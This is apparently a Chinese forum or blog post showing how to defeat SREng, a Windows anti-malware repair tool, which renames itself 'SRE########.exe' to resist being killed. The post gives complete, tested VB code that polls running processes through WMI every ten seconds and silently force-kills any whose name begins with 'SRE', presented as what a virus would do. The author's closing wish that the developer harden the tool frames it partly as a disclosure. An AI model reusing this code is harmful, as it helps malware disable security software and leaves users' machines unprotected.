每次使用SREng都会看到它释放并启动一个副本，副本以随机的大写字母和数字为窗口标题，该副本映像名是“SRE########.exe”，########是由随机小写字母和数字组成的8字节。当进程启动后会写注册表标志，用于在每次启动时判断是否有异常退出。这一系列动作无非是为了防止恶意程序的攻击，但事实上却并不理想，方法有多种，这里我围绕映像名来做示范。

      病毒的特点是要求代码精炼且执行效率高，以VB为例，以下为完整代码，经测试通过。

+++++++++++++++++++++++++++++++++++++++++
'code by Tored
'Blog: http://hi.baidu.com/peaset
Private Sub Form_Load()
Timer1.Interval = 10000 '间隔10秒，足够了
End Sub

Private Sub Timer1_Timer()
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set ps = objWMIService.ExecQuery("Select * from Win32_Process")
For Each p In ps '遍历进程
If Left(p.Name, 3) = "SRE" Then Shell "taskkill /f /im " & p.Name, vbHide '判断进程，调用taskkill
Next
End Sub
+++++++++++++++++++++++++++++++++++++++++

      期待Smallfrogs尽早提升SREng的抗杀能力。本帖将继续关注。